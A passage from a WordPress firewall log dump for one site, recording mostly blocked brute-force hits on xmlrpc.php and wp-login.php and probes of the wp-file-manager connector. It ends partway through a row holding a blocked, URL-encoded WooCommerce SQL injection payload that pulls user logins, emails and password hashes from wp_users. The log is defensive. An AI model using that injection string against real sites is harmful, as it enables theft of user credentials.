Wordfence Security Network',NULL),(11298,0.000000,1631446162.021223,'\0\0\0\0\0\0\0\0\0\0��ν�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11299,0.000000,1631446421.910458,'\0\0\0\0\0\0\0\0\0\0���_S�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11300,0.000000,1631446539.429241,'\0\0\0\0\0\0\0\0\0\0��6\'iX',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11301,0.000000,1631446871.823104,'\0\0\0\0\0\0\0\0\0\0���Gf',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11302,0.000000,1631447778.817691,'\0\0\0\0\0\0\0\0\0\0���z.�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11303,0.000000,1631448113.613154,'\0\0\0\0\0\0\0\0\0\0��-wS�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11304,0.000000,1631448488.298993,'\0\0\0\0\0\0\0\0\0\0��#�^_',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11305,0.000000,1631448852.034537,'\0\0\0\0\0\0\0\0\0\0��X�$�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11306,0.000000,1631449108.498442,'\0\0\0\0\0\0\0\0\0\0��ʽ��',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11307,0.000000,1631449196.722579,'\0\0\0\0\0\0\0\0\0\0��3\rH�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11308,0.000000,1631449527.856630,'\0\0\0\0\0\0\0\0\0\0��3Q�x',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11309,0.000000,1631449906.394395,'\0\0\0\0\0\0\0\0\0\0��$\\',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11310,0.000000,1631450259.464131,'\0\0\0\0\0\0\0\0\0\0��-v�W',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11311,0.000000,1631450643.788685,'\0\0\0\0\0\0\0\0\0\0���t�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11312,0.000000,1631450981.768546,'\0\0\0\0\0\0\0\0\0\0��QX4�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11313,0.000000,1631451332.562193,'\0\0\0\0\0\0\0\0\0\0���[a�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11314,0.000000,1631451699.026484,'\0\0\0\0\0\0\0\0\0\0����7',0,200,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(11315,0.000000,1631452061.814335,'\0\0\0\0\0\0\0\0\0\0��k�X)',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11316,0.000000,1631452432.220850,'\0\0\0\0\0\0\0\0\0\0���H�l',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11317,0.000000,1631452818.773480,'\0\0\0\0\0\0\0\0\0\0����B',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11318,0.000000,1631453171.449109,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11319,0.000000,1631453547.935278,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11320,0.000000,1631453928.386715,'\0\0\0\0\0\0\0\0\0\0����8$',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11321,0.000000,1631453971.018286,'\0\0\0\0\0\0\0\0\0\0��Y�A�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11322,0.000000,1631454300.591446,'\0\0\0\0\0\0\0\0\0\0��X�%1',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11323,0.000000,1631454655.904450,'\0\0\0\0\0\0\0\0\0\0��#ݵ�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11324,0.000000,1631455059.884853,'\0\0\0\0\0\0\0\0\0\0��]qo\"',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11325,0.000000,1631455435.574720,'\0\0\0\0\0\0\0\0\0\0��m�;-',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11326,0.000000,1631456194.793307,'\0\0\0\0\0\0\0\0\0\0����BY',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11327,0.000000,1631456578.889609,'\0\0\0\0\0\0\0\0\0\0��h��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11328,0.000000,1631456697.845834,'\0\0\0\0\0\0\0\0\0\0���B��',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11329,0.000000,1631456971.607774,'\0\0\0\0\0\0\0\0\0\0��#�1�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11330,0.000000,1631457347.201708,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11331,0.000000,1631458740.763682,'\0\0\0\0\0\0\0\0\0\0���Dd@',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11332,0.000000,1631459773.436493,'\0\0\0\0\0\0\0\0\0\0��-��^',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','https://www.dogstardesign.co.uk','Opera/9.80 (Windows NT 6.1; WOW64; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.16','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11333,0.000000,1631460283.070199,'\0\0\0\0\0\0\0\0\0\0��T��',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11334,0.000000,1631461498.657232,'\0\0\0\0\0\0\0\0\0\0��-xEy',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11335,0.000000,1631463007.860604,'\0\0\0\0\0\0\0\0\0\0��*��',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11336,1631465144.397935,1631465144.000400,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dogstardesign.co.uk/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1maWxlLW1hbmFnZXIvbGliL3BocC9jb25uZWN0b3IubWluaW1hbC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11337,0.000000,1631465459.867882,'\0\0\0\0\0\0\0\0\0\0��#�Y',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11338,0.000000,1631466882.800946,'\0\0\0\0\0\0\0\0\0\0��-(��',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11339,0.000000,1631468014.532057,'\0\0\0\0\0\0\0\0\0\0����p�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11340,0.000000,1631469141.405501,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11341,0.000000,1631470448.534464,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11342,0.000000,1631471563.497545,'\0\0\0\0\0\0\0\0\0\0���j �',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11343,0.000000,1631472663.826806,'\0\0\0\0\0\0\0\0\0\0���#�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11344,0.000000,1631474057.136394,'\0\0\0\0\0\0\0\0\0\0������',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11345,0.000000,1631475255.861614,'\0\0\0\0\0\0\0\0\0\0����bc',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11346,0.000000,1631476668.670106,'\0\0\0\0\0\0\0\0\0\0��-��^',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','https://www.dogstardesign.co.uk','Opera/9.80 (Windows NT 6.2; WOW64; MRA 5.8 (build 4664)) Presto/2.12.388 Version/12.16','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11347,0.000000,1631477596.731978,'\0\0\0\0\0\0\0\0\0\0���7o\r',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11348,0.000000,1631478622.236682,'\0\0\0\0\0\0\0\0\0\0��h���',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11349,0.000000,1631479641.222650,'\0\0\0\0\0\0\0\0\0\0���E\"�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11350,1631480544.850914,1631480544.759700,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://dogstardesign.co.uk/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1maWxlLW1hbmFnZXIvbGliL3BocC9jb25uZWN0b3IubWluaW1hbC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11351,0.000000,1631480724.628743,'\0\0\0\0\0\0\0\0\0\0���^�M',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11352,0.000000,1631481765.346899,'\0\0\0\0\0\0\0\0\0\0��ν',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11353,0.000000,1631482792.328343,'\0\0\0\0\0\0\0\0\0\0��#��v',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11354,0.000000,1631483798.877342,'\0\0\0\0\0\0\0\0\0\0��tv0�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11355,0.000000,1631484836.588294,'\0\0\0\0\0\0\0\0\0\0���X2�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11356,0.000000,1631485853.840353,'\0\0\0\0\0\0\0\0\0\0����}',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11357,0.000000,1631486872.136922,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11358,0.000000,1631487911.379774,'\0\0\0\0\0\0\0\0\0\0��\"�1�',0,200,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(11359,0.000000,1631488931.860612,'\0\0\0\0\0\0\0\0\0\0��R�,�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11360,0.000000,1631492055.767729,'\0\0\0\0\0\0\0\0\0\0��/sM�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11361,0.000000,1631494103.315833,'\0\0\0\0\0\0\0\0\0\0��-xEy',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11362,0.000000,1631495145.712762,'\0\0\0\0\0\0\0\0\0\0��-(��',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11363,0.000000,1631496179.502246,'\0\0\0\0\0\0\0\0\0\0��ν�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11364,0.000000,1631498242.314435,'\0\0\0\0\0\0\0\0\0\0��^x�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11365,0.000000,1631499305.246865,'\0\0\0\0\0\0\0\0\0\0��/i=#',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11366,0.000000,1631500335.615598,'\0\0\0\0\0\0\0\0\0\0��\"]$d',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11367,0.000000,1631501365.355581,'\0\0\0\0\0\0\0\0\0\0��E�φ',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11368,0.000000,1631502553.684524,'\0\0\0\0\0\0\0\0\0\0��a��',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11369,0.000000,1631503496.592664,'\0\0\0\0\0\0\0\0\0\0���]�_',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11370,0.000000,1631504513.011995,'\0\0\0\0\0\0\0\0\0\0����E.',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11371,0.000000,1631505522.969972,'\0\0\0\0\0\0\0\0\0\0��F$R',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11372,0.000000,1631506539.330730,'\0\0\0\0\0\0\0\0\0\0���#�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11373,0.000000,1631507519.164095,'\0\0\0\0\0\0\0\0\0\0��QEˣ',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11374,0.000000,1631508489.711782,'\0\0\0\0\0\0\0\0\0\0��_��[',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11375,0.000000,1631509501.834266,'\0\0\0\0\0\0\0\0\0\0��Y`Z}',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11376,0.000000,1631510501.075628,'\0\0\0\0\0\0\0\0\0\0��QX4�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11377,0.000000,1631511304.913468,'\0\0\0\0\0\0\0\0\0\0��-��^',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','https://www.dogstardesign.co.uk','Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2159.4 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11378,1631511340.184859,1631511340.066600,'\0\0\0\0\0\0\0\0\0\0���JL�',0,403,0,0,0,'https://www.dogstardesign.co.uk/wp-json/wc/store/products/collection-data?calculate_attribute_counts%5B0%5D%5Btaxonomy%5D=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252Cuser_login%25252C0x3a%25252Cuser_email%25252C0x3a%25252Cuser_pass%252529from%252520wp_users%252520%25253B%252500',NULL,'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','blocked:waf','WooCommerce < 5.5.1 SQL 